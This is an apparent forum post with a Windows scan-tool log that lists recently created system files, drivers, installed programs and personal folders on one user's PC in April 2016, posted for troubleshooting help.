2016-04-15 22:24 - 2016-02-23 12:17 - 00146272 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2016-04-15 22:24 - 2016-02-23 11:45 - 02773096 _____ (Microsoft Corporation) C:\Windows\system32\d3d11.dll
2016-04-15 22:24 - 2016-02-23 11:40 - 00430944 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2016-04-15 22:24 - 2016-02-23 11:38 - 02180136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfcore.dll
2016-04-15 22:24 - 2016-02-23 11:38 - 00980352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfasfsrcsnk.dll
2016-04-15 22:24 - 2016-02-23 11:38 - 00895080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfsrcsnk.dll
2016-04-15 22:24 - 2016-02-23 11:38 - 00882720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmp4srcsnk.dll
2016-04-15 22:24 - 2016-02-23 11:38 - 00450912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MFCaptureEngine.dll
2016-04-15 22:24 - 2016-02-23 11:38 - 00420928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvproc.dll
2016-04-15 22:24 - 2016-02-23 11:37 - 00713824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmpeg2srcsnk.dll
2016-04-15 22:24 - 2016-02-23 11:32 - 00791744 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2016-04-15 22:24 - 2016-02-23 11:30 - 02919320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2016-04-15 22:24 - 2016-02-23 11:27 - 00376536 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.MediaControl.dll
2016-04-15 22:24 - 2016-02-23 11:25 - 00534368 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\USBHUB3.SYS
2016-04-15 22:24 - 2016-02-23 11:20 - 01139712 _____ (Microsoft Corporation) C:\Windows\system32\XblGameSave.dll
2016-04-15 22:24 - 2016-02-23 11:20 - 00238592 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\xboxgip.sys
2016-04-15 22:24 - 2016-02-23 11:17 - 00649216 _____ (Microsoft Corporation) C:\Windows\system32\ngcsvc.dll
2016-04-15 22:24 - 2016-02-23 11:12 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\provpackageapidll.dll
2016-04-15 22:24 - 2016-02-23 11:10 - 00027648 _____ (Microsoft Corporation) C:\Windows\system32\WiFiConfigSP.dll
2016-04-15 22:24 - 2016-02-23 11:07 - 00037376 _____ (Microsoft Corporation) C:\Windows\system32\LaunchWinApp.exe
2016-04-15 22:24 - 2016-02-23 11:07 - 00026112 _____ (Microsoft Corporation) C:\Windows\system32\wlansvcpal.dll
2016-04-15 22:24 - 2016-02-23 11:06 - 00129536 _____ (Microsoft Corporation) C:\Windows\system32\flvprophandler.dll
2016-04-15 22:24 - 2016-02-23 11:01 - 00104960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rasl2tp.sys
2016-04-15 22:24 - 2016-02-23 11:00 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\EnterpriseDesktopAppMgmtCSP.dll
2016-04-15 22:24 - 2016-02-23 11:00 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\wfdprov.dll
2016-04-15 22:24 - 2016-02-23 10:58 - 00025088 _____ (Microsoft Corporation) C:\Windows\system32\irmon.dll
2016-04-15 22:24 - 2016-02-23 10:56 - 02186864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d11.dll
2016-04-15 22:24 - 2016-02-23 10:55 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\bridge.sys
2016-04-15 22:24 - 2016-02-23 10:53 - 00115712 _____ (Microsoft Corporation) C:\Windows\system32\srpapi.dll
2016-04-15 22:24 - 2016-02-23 10:53 - 00099328 _____ (Microsoft Corporation) C:\Windows\system32\ngckeyenum.dll
2016-04-15 22:24 - 2016-02-23 10:52 - 00087040 _____ (Microsoft Corporation) C:\Windows\system32\MDMAppInstaller.exe
2016-04-15 22:24 - 2016-02-23 10:50 - 00159232 _____ (Microsoft Corporation) C:\Windows\system32\DeviceCensus.exe
2016-04-15 22:24 - 2016-02-23 10:48 - 00041984 _____ (Microsoft Corporation) C:\Windows\system32\TimeBrokerClient.dll
2016-04-15 22:24 - 2016-02-23 10:40 - 00074240 _____ (Microsoft Corporation) C:\Windows\system32\SMSRouter.dll
2016-04-15 22:24 - 2016-02-23 10:39 - 00178176 _____ (Microsoft Corporation) C:\Windows\system32\psmsrv.dll
2016-04-15 22:24 - 2016-02-23 10:38 - 00320000 _____ (Microsoft Corporation) C:\Windows\system32\MSFlacDecoder.dll
2016-04-15 22:24 - 2016-02-23 10:38 - 00287712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.MediaControl.dll
2016-04-15 22:24 - 2016-02-23 10:37 - 00274944 _____ (Microsoft Corporation) C:\Windows\system32\DisplayManager.dll
2016-04-15 22:24 - 2016-02-23 10:36 - 00216576 _____ (Microsoft Corporation) C:\Windows\system32\QuickActionsDataModel.dll
2016-04-15 22:24 - 2016-02-23 10:34 - 00305664 _____ (Microsoft Corporation) C:\Windows\system32\wifiprofilessettinghandler.dll
2016-04-15 22:24 - 2016-02-23 10:34 - 00189952 _____ (Microsoft Corporation) C:\Windows\system32\WiFiDisplay.dll
2016-04-15 22:24 - 2016-02-23 10:33 - 00558080 _____ (Microsoft Corporation) C:\Windows\system32\MBMediaManager.dll
2016-04-15 22:24 - 2016-02-23 10:31 - 00463360 _____ (Microsoft Corporation) C:\Windows\system32\wlansec.dll
2016-04-15 22:24 - 2016-02-23 10:29 - 00591872 _____ (Microsoft Corporation) C:\Windows\system32\SmsRouterSvc.dll
2016-04-15 22:24 - 2016-02-23 10:27 - 00307712 _____ (Microsoft Corporation) C:\Windows\system32\usbmon.dll
2016-04-15 22:24 - 2016-02-23 10:26 - 00372224 _____ (Microsoft Corporation) C:\Windows\system32\MDEServer.exe
2016-04-15 22:24 - 2016-02-23 10:23 - 00412672 _____ (Microsoft Corporation) C:\Windows\system32\wlanmsm.dll
2016-04-15 22:24 - 2016-02-23 10:22 - 00567808 _____ (Microsoft Corporation) C:\Windows\system32\MCRecvSrc.dll
2016-04-15 22:24 - 2016-02-23 10:20 - 00847360 _____ (Microsoft Corporation) C:\Windows\system32\netlogon.dll
2016-04-15 22:24 - 2016-02-23 10:20 - 00606720 _____ (Microsoft Corporation) C:\Windows\system32\wcmsvc.dll
2016-04-15 22:24 - 2016-02-23 10:20 - 00493568 _____ (Microsoft Corporation) C:\Windows\system32\mfmkvsrcsnk.dll
2016-04-15 22:24 - 2016-02-23 10:19 - 00517632 _____ (Microsoft Corporation) C:\Windows\system32\winspool.drv
2016-04-15 22:24 - 2016-02-23 10:14 - 00828928 _____ (Microsoft Corporation) C:\Windows\system32\Windows.AccountsControl.dll
2016-04-15 22:24 - 2016-02-23 10:14 - 00029696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\LaunchWinApp.exe
2016-04-15 22:24 - 2016-02-23 10:10 - 00997376 _____ (Microsoft Corporation) C:\Windows\system32\schedsvc.dll
2016-04-15 22:24 - 2016-02-23 10:09 - 00870400 _____ (Microsoft Corporation) C:\Windows\system32\modernexecserver.dll
2016-04-15 22:24 - 2016-02-23 10:04 - 01131520 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.Audio.dll
2016-04-15 22:24 - 2016-02-23 10:04 - 00673792 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.dll
2016-04-15 22:24 - 2016-02-23 10:04 - 00382464 _____ (Microsoft Corporation) C:\Windows\system32\wuuhext.dll
2016-04-15 22:24 - 2016-02-23 10:02 - 01318912 _____ (Microsoft Corporation) C:\Windows\system32\wifinetworkmanager.dll
2016-04-15 22:24 - 2016-02-23 10:02 - 00755712 _____ (Microsoft Corporation) C:\Windows\system32\spoolsv.exe
2016-04-15 22:24 - 2016-02-23 10:02 - 00285696 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2016-04-15 22:24 - 2016-02-23 09:58 - 00163840 _____ (Microsoft Corporation) C:\Windows\system32\TimeBrokerServer.dll
2016-04-15 22:24 - 2016-02-23 09:57 - 00031744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TimeBrokerClient.dll
2016-04-15 22:24 - 2016-02-23 09:50 - 00266752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSFlacDecoder.dll
2016-04-15 22:24 - 2016-02-23 09:49 - 00200704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DisplayManager.dll
2016-04-15 22:24 - 2016-02-23 09:48 - 00838144 _____ (Microsoft Corporation) C:\Windows\system32\uDWM.dll
2016-04-15 22:24 - 2016-02-23 09:47 - 00157184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WiFiDisplay.dll
2016-04-15 22:24 - 2016-02-23 09:38 - 00480256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MCRecvSrc.dll
2016-04-15 22:24 - 2016-02-23 09:37 - 01118208 _____ (Microsoft Corporation) C:\Windows\system32\localspl.dll
2016-04-15 22:24 - 2016-02-23 09:37 - 00613376 _____ (Microsoft Corporation) C:\Windows\system32\SettingSync.dll
2016-04-15 22:24 - 2016-02-23 09:36 - 00713728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netlogon.dll
2016-04-15 22:24 - 2016-02-23 09:36 - 00379392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmkvsrcsnk.dll
2016-04-15 22:24 - 2016-02-23 09:35 - 00400896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winspool.drv
2016-04-15 22:24 - 2016-02-23 09:31 - 00585216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.AccountsControl.dll
2016-04-15 22:24 - 2016-02-23 09:24 - 04827136 _____ (Microsoft Corporation) C:\Windows\system32\ExplorerFrame.dll
2016-04-15 22:24 - 2016-02-23 09:24 - 01105920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.Audio.dll
2016-04-15 22:24 - 2016-02-23 09:24 - 00489984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.dll
2016-04-15 22:24 - 2016-02-23 09:14 - 00990720 _____ (Microsoft Corporation) C:\Windows\system32\SettingSyncCore.dll
2016-04-15 22:24 - 2016-02-23 09:05 - 00503296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SettingSync.dll
2016-04-15 22:24 - 2016-02-23 09:01 - 02295808 _____ (Microsoft Corporation) C:\Windows\system32\wlansvc.dll
2016-04-15 22:24 - 2016-02-23 08:56 - 04412928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExplorerFrame.dll
2016-04-15 22:24 - 2016-02-23 08:51 - 00754176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SettingSyncCore.dll
2016-04-15 22:24 - 2016-02-23 08:41 - 02912256 _____ (Microsoft Corporation) C:\Windows\system32\CertEnroll.dll
2016-04-15 22:24 - 2016-02-23 08:39 - 02581504 _____ (Microsoft Corporation) C:\Windows\system32\MFMediaEngine.dll
2016-04-15 22:24 - 2016-02-23 08:33 - 02604032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CertEnroll.dll
2016-04-15 22:24 - 2016-02-23 08:30 - 02061312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MFMediaEngine.dll
2016-04-15 22:24 - 2016-02-23 08:28 - 06740992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2016-04-15 22:24 - 2016-02-09 05:18 - 00297472 _____ (Microsoft Corporation) C:\Windows\system32\thumbcache.dll
2016-04-15 22:24 - 2016-02-09 05:18 - 00237056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\thumbcache.dll
2016-04-15 22:24 - 2016-02-09 05:07 - 00086016 _____ (Microsoft Corporation) C:\Windows\system32\DeviceEnroller.exe
2016-04-15 22:10 - 2016-04-15 21:10 - 00000000 ____D C:\Windows\Panther
2016-04-15 22:09 - 2016-04-15 22:10 - 00000000 ____D C:\Users\Marcel\AppData\Roaming\mIRC
2016-04-15 22:09 - 2016-04-15 22:09 - 00008192 __RSH C:\BOOTSECT.BAK
2016-04-15 21:54 - 2016-04-15 21:54 - 00000000 ____D C:\Users\Marcel\AppData\Roaming\MPC-HC
2016-04-15 21:52 - 2016-04-15 21:52 - 00000000 ____D C:\Users\Marcel\Tracing
2016-04-15 21:51 - 2016-04-18 11:33 - 00000000 ____D C:\Users\Marcel\AppData\Roaming\Skype
2016-04-15 21:51 - 2016-04-16 14:38 - 00000000 ____D C:\Users\Marcel\AppData\Local\JDownloader v2.0
2016-04-15 21:51 - 2016-04-15 21:51 - 00000000 ___RD C:\Program Files (x86)\Skype
2016-04-15 21:51 - 2016-04-15 21:51 - 00000000 ____D C:\Users\Marcel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\JDownloader
2016-04-15 21:51 - 2016-04-15 21:51 - 00000000 ____D C:\ProgramData\Skype
2016-04-15 21:51 - 2016-04-15 21:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2016-04-15 21:50 - 2016-04-15 21:50 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MPC-HC x64
2016-04-15 21:50 - 2016-04-15 21:50 - 00000000 ____D C:\Program Files\MPC-HC
2016-04-15 21:49 - 2016-04-15 22:49 - 00000000 ____D C:\ProgramData\Adobe
2016-04-15 21:49 - 2016-04-15 21:49 - 00003972 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2016-04-15 21:49 - 2016-04-15 21:49 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2016-04-15 21:49 - 2016-04-15 21:49 - 00000000 ____D C:\Program Files (x86)\Adobe
2016-04-15 21:47 - 2016-04-15 21:47 - 00097856 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2016-04-15 21:47 - 2016-04-15 21:47 - 00000000 ____D C:\Users\Marcel\AppData\Roaming\Sun
2016-04-15 21:47 - 2016-04-15 21:47 - 00000000 ____D C:\Users\Marcel\AppData\LocalLow\Sun
2016-04-15 21:47 - 2016-04-15 21:47 - 00000000 ____D C:\Users\Marcel\.oracle_jre_usage
2016-04-15 21:47 - 2016-04-15 21:47 - 00000000 ____D C:\ProgramData\Oracle
2016-04-15 21:47 - 2016-04-15 21:47 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-04-15 21:46 - 2016-04-15 21:46 - 00000000 ____D C:\Users\Marcel\AppData\LocalLow\Oracle
2016-04-15 21:46 - 2016-04-15 21:46 - 00000000 ____D C:\Program Files (x86)\Java
2016-04-15 21:45 - 2016-04-18 03:00 - 00000884 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-04-15 21:45 - 2016-04-15 21:45 - 00003860 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2016-04-15 21:45 - 2016-04-15 21:45 - 00000000 ____D C:\Users\Marcel\AppData\Roaming\Macromedia
2016-04-15 21:45 - 2016-04-15 21:45 - 00000000 ____D C:\Users\Marcel\AppData\Local\Macromedia
2016-04-15 21:44 - 2016-04-15 23:03 - 00000000 ____D C:\Users\Marcel\AppData\Local\Adobe
2016-04-15 21:43 - 2016-04-15 21:43 - 00000755 _____ C:\Users\Marcel\Desktop\Downloads - Verknüpfung.lnk
2016-04-15 21:36 - 2016-04-15 21:36 - 00021288 _____ (RW-Everything) C:\Windows\SysWOW64\Drivers\AsrSmartConnectDrv.sys
2016-04-15 21:36 - 2016-04-15 21:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ASRock Utility
2016-04-15 21:36 - 2016-04-15 21:36 - 00000000 ____D C:\Program Files\ASRock Utility
2016-04-15 21:33 - 2016-04-15 21:33 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CPUID
2016-04-15 21:33 - 2016-04-15 21:33 - 00000000 ____D C:\Program Files\CPUID
2016-04-15 21:31 - 2016-04-15 21:31 - 00000000 ____D C:\Users\Marcel\AppData\Local\Comms
2016-04-15 21:27 - 2016-04-15 21:27 - 00000000 ____D C:\Users\Marcel\Documents\Uni
2016-04-15 21:27 - 2016-04-15 21:27 - 00000000 ____D C:\Users\Marcel\Documents\TransOcean
2016-04-15 21:27 - 2016-04-15 21:27 - 00000000 ____D C:\Users\Marcel\Documents\The Witcher 3
2016-04-15 21:27 - 2016-04-15 21:27 - 00000000 ____D C:\Users\Marcel\Documents\Syberia Saves
2016-04-15 21:27 - 2016-04-15 21:27 - 00000000 ____D C:\Users\Marcel\Documents\Soundaufnahmen
2016-04-15 21:27 - 2016-04-15 21:27 - 00000000 ____D C:\Users\Marcel\Documents\samsung
2016-04-15 21:27 - 2016-04-15 21:27 - 00000000 ____D C:\Users\Marcel\Documents\Rockstar Games
2016-04-15 21:27 - 2016-04-15 21:27 - 00000000 ____D C:\Users\Marcel\Documents\RCT3
2016-04-15 21:27 - 2016-04-15 21:27 - 00000000 ____D C:\Users\Marcel\Documents\papa
2016-04-15 21:26 - 2016-04-15 21:26 - 00000000 ____D C:\Users\Marcel\Documents\My Games
2016-04-15 21:26 - 2016-04-15 21:26 - 00000000 ____D C:\Users\Marcel\Documents\MeinSpore-Kreationen
2016-04-15 21:26 - 2016-04-15 21:26 - 00000000 ____D C:\Users\Marcel\Documents\League of Legends
2016-04-15 21:26 - 2016-04-15 21:26 - 00000000 ____D C:\Users\Marcel\Documents\KDV
2016-04-15 21:26 - 2016-04-15 21:26 - 00000000 ____D C:\Users\Marcel\Documents\Heroes of the Storm
2016-04-15 21:26 - 2016-04-15 21:26 - 00000000 ____D C:\Users\Marcel\Documents\Hallo Pizza
2016-04-15 21:26 - 2016-04-15 21:26 - 00000000 ____D C:\Users\Marcel\Documents\Gericht
2016-04-15 21:26 - 2016-04-15 21:26 - 00000000 ____D C:\Users\Marcel\Documents\FH Bewerbung 2013
2016-04-15 21:26 - 2016-04-15 21:26 - 00000000 ____D C:\Users\Marcel\Documents\FH
2016-04-15 21:26 - 2016-04-15 21:26 - 00000000 ____D C:\Users\Marcel\Documents\Eigene Dateien
2016-04-15 21:26 - 2016-04-15 21:26 - 00000000 ____D C:\Users\Marcel\Documents\Bewerbungen u. Kündigungen
2016-04-15 21:26 - 2016-04-15 21:26 - 00000000 ____D C:\Users\Marcel\Documents\Anderes
2016-04-15 21:26 - 2016-04-15 21:26 - 00000000 ____D C:\Users\Marcel\Documents\Amt
2016-04-15 21:26 - 2016-04-15 21:26 - 00000000 ____D C:\Users\Marcel\Desktop\Studium
2016-04-15 21:26 - 2015-10-26 20:28 - 00000000 ____D C:\Users\Marcel\Documents\Benutzerdefinierte Office-Vorlagen
2016-04-15 21:25 - 2016-04-15 21:25 - 00000000 ____D C:\temp
2016-04-15 21:25 - 2016-04-15 21:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vulkan
2016-04-15 21:25 - 2016-04-15 21:25 - 00000000 ____D C:\Program Files (x86)\VulkanRT
2016-04-15 21:25 - 2016-03-22 04:37 - 00530880 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshext.dll
2016-04-15 21:25 - 2016-03-22 04:37 - 00083512 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshextr.dll
2016-04-15 21:25 - 2016-03-22 03:57 - 00110528 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvStreaming.exe
2016-04-15 21:25 - 2016-03-16 23:30 - 00128792 _____ C:\Windows\SysWOW64\vulkan-1.dll
2016-04-15 21:25 - 2016-03-16 23:29 - 00127768 _____ C:\Windows\system32\vulkan-1.dll
2016-04-15 21:25 - 2016-03-16 23:29 - 00041752 _____ C:\Windows\SysWOW64\vulkaninfo.exe
2016-04-15 21:25 - 2016-03-16 23:28 - 00045848 _____ C:\Windows\system32\vulkaninfo.exe
2016-04-15 21:24 - 2016-04-18 11:18 - 00004172 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{F7A7988A-3F79-4317-94A7-DDD6DFAFD890}
2016-04-15 21:24 - 2016-04-15 21:32 - 00000000 ____D C:\Users\Marcel\AppData\Local\Thunderbird
2016-04-15 21:24 - 2016-04-15 21:24 - 00001278 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Thunderbird.lnk
2016-04-15 21:24 - 2016-04-15 21:24 - 00000000 ____D C:\Users\Marcel\AppData\Roaming\WinRAR
2016-04-15 21:24 - 2016-04-15 21:24 - 00000000 ____D C:\Users\Marcel\AppData\Roaming\Thunderbird
2016-04-15 21:24 - 2016-04-15 21:24 - 00000000 ____D C:\Program Files (x86)\Mozilla Thunderbird
2016-04-15 21:24 - 2016-03-24 13:52 - 00039240 _____ (NVIDIA Corporation) C:\Windows\system32\nvhdap64.dll
2016-04-15 21:24 - 2016-03-22 06:08 - 42923576 _____ C:\Windows\system32\nvcompiler.dll
2016-04-15 21:24 - 2016-03-22 06:08 - 37567424 _____ C:\Windows\SysWOW64\nvcompiler.dll
2016-04-15 21:24 - 2016-03-22 06:08 - 31594432 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglv64.dll
2016-04-15 21:24 - 2016-03-22 06:08 - 25350080 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglv32.dll
2016-04-15 21:24 - 2016-03-22 06:08 - 21364536 _____ (NVIDIA Corporation) C:\Windows\system32\nvopencl.dll
2016-04-15 21:24 - 2016-03-22 06:08 - 20906168 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuda.dll
2016-04-15 21:24 - 2016-03-22 06:08 - 17755928 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvopencl.dll
2016-04-15 21:24 - 2016-03-22 06:08 - 17369448 _____ (NVIDIA Corporation) C:\Windows\system32\nvd3dumx.dll
2016-04-15 21:24 - 2016-03-22 06:08 - 17349776 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuda.dll
2016-04-15 21:24 - 2016-03-22 06:08 - 10550552 _____ C:\Windows\system32\nvptxJitCompiler.dll
2016-04-15 21:24 - 2016-03-22 06:08 - 08659472 _____ C:\Windows\SysWOW64\nvptxJitCompiler.dll
2016-04-15 21:24 - 2016-03-22 06:08 - 02614208 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuvid.dll
2016-04-15 21:24 - 2016-03-22 06:08 - 02260024 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuvid.dll
2016-04-15 21:24 - 2016-03-22 06:08 - 01922496 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispco6436472.dll
2016-04-15 21:24 - 2016-03-22 06:08 - 01571776 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispgenco6436472.dll
2016-04-15 21:24 - 2016-03-22 06:08 - 00960056 _____ (NVIDIA Corporation) C:\Windows\system32\NvFBC64.dll
2016-04-15 21:24 - 2016-03-22 06:08 - 00889400 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFR64.dll
2016-04-15 21:24 - 2016-03-22 06:08 - 00786872 _____ (NVIDIA Corporation) C:\Windows\system32\nvEncMFTH264.dll
2016-04-15 21:24 - 2016-03-22 06:08 - 00751552 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvFBC.dll
2016-04-15 21:24 - 2016-03-22 06:08 - 00695864 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFR.dll
2016-04-15 21:24 - 2016-03-22 06:08 - 00678520 _____ C:\Windows\system32\nvfatbinaryLoader.dll
2016-04-15 21:24 - 2016-03-22 06:08 - 00632336 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvEncMFTH264.dll
2016-04-15 21:24 - 2016-03-22 06:08 - 00572096 _____ C:\Windows\SysWOW64\nvfatbinaryLoader.dll
2016-04-15 21:24 - 2016-03-22 06:08 - 00546328 _____ (NVIDIA Corporation) C:\Windows\system32\nvumdshimx.dll
2016-04-15 21:24 - 2016-03-22 06:08 - 00448824 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvumdshim.dll
2016-04-15 21:24 - 2016-03-22 06:08 - 00425016 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFROpenGL.dll
2016-04-15 21:24 - 2016-03-22 06:08 - 00385080 _____ (NVIDIA Corporation) C:\Windows\system32\nvDecMFTMjpeg.dll
2016-04-15 21:24 - 2016-03-22 06:08 - 00379448 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFROpenGL.dll
2016-04-15 21:24 - 2016-03-22 06:08 - 00379296 _____ (NVIDIA Corporation) C:\Windows\system32\nvEncodeAPI64.dll
2016-04-15 21:24 - 2016-03-22 06:08 - 00348216 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvDecMFTMjpeg.dll
2016-04-15 21:24 - 2016-03-22 06:08 - 00317656 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvEncodeAPI.dll
2016-04-15 21:24 - 2016-03-22 06:08 - 00176064 _____ (NVIDIA Corporation) C:\Windows\system32\nvinitx.dll
2016-04-15 21:24 - 2016-03-22 06:08 - 00153392 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvinit.dll
2016-04-15 21:24 - 2016-03-22 06:08 - 00151368 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglshim64.dll
2016-04-15 21:24 - 2016-03-22 06:08 - 00129208 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglshim32.dll
2016-04-15 21:24 - 2016-03-22 06:08 - 00000139 _____ C:\Windows\SysWOW64\nv-vk32.json
2016-04-15 21:24 - 2016-03-22 06:08 - 00000139 _____ C:\Windows\system32\nv-vk64.json
2016-04-15 21:23 - 2015-12-14 23:24 - 00130880 _____ (Razer, Inc.) C:\Windows\system32\Drivers\rzpnk.sys
2016-04-15 21:23 - 2015-09-22 23:36 - 00037184 _____ (Razer, Inc.) C:\Windows\system32\Drivers\rzpmgrk.sys
2016-04-15 21:22 - 2016-04-15 21:22 - 00000000 ____D C:\Users\Marcel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2016-04-15 21:22 - 2016-04-15 21:22 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2016-04-15 21:22 - 2016-04-15 21:22 - 00000000 ____D C:\Program Files\WinRAR
2016-04-15 21:22 - 2016-04-15 21:22 - 00000000 ____D C:\Program Files\Razer Chroma SDK
2016-04-15 21:22 - 2016-04-15 21:22 - 00000000 ____D C:\Program Files (x86)\Razer Chroma SDK
2016-04-15 21:21 - 2016-04-16 14:33 - 00000000 ____D C:\ProgramData\Package Cache
2016-04-15 21:21 - 2016-04-15 21:23 - 00000000 ____D C:\ProgramData\Razer
2016-04-15 21:21 - 2016-04-15 21:23 - 00000000 ____D C:\Program Files (x86)\Razer
2016-04-15 21:21 - 2016-04-15 21:21 - 00000000 ____D C:\Users\Marcel\AppData\Local\Razer
2016-04-15 21:21 - 2016-04-15 21:21 - 00000000 ____D C:\Users\Marcel\AppData\Local\NVIDIA Corporation
2016-04-15 21:21 - 2016-04-15 21:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Razer
2016-04-15 21:21 - 2016-04-05 09:48 - 01373864 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvspcap.dll
2016-04-15 21:21 - 2016-04-05 09:48 - 01316000 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvspbridge.dll
2016-04-15 21:21 - 2016-04-05 09:47 - 01767432 _____ (NVIDIA Corporation) C:\Windows\system32\nvspcap64.dll
2016-04-15 21:21 - 2016-04-05 09:47 - 01756424 _____ (NVIDIA Corporation) C:\Windows\system32\nvspbridge64.dll
2016-04-15 21:21 - 2016-04-05 09:47 - 00112032 _____ C:\Windows\system32\NvRtmpStreamer64.dll
2016-04-15 21:21 - 2010-05-26 11:41 - 02401112 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_43.dll
2016-04-15 21:21 - 2010-05-26 11:41 - 01998168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_43.dll
2016-04-15 21:21 - 2010-05-26 11:41 - 00511328 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_43.dll
2016-04-15 21:21 - 2010-05-26 11:41 - 00470880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_43.dll
2016-04-15 21:21 - 2010-05-26 11:41 - 00276832 _____ (Microsoft Corporation) C:\Windows\system32\d3dx11_43.dll
2016-04-15 21:21 - 2010-05-26 11:41 - 00248672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx11_43.dll
2016-04-15 21:20 - 2016-03-21 22:01 - 00109632 _____ (NVIDIA Corporation) C:\Windows\system32\nvaudcap64v.dll
2016-04-15 21:20 - 2016-03-21 22:01 - 00100416 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvaudcap32v.dll
2016-04-15 21:20 - 2016-03-21 22:01 - 00056384 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvvad64v.sys

Jerichoholic 18.04.2016 15:28
Code:
2016-04-15 21:19 - 2016-04-18 11:41 - 00000000 ____D C:\mIRC
2016-04-15 21:19 - 2016-04-15 22:33 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-04-15 21:19 - 2016-04-15 21:25 - 00000000 ____D C:\Users\Marcel\AppData\Local\Mozilla
2016-04-15 21:19 - 2016-04-15 21:19 - 00037144 _____ (AVAST Software) C:\Windows\system32\Drivers\aswKbd.sys
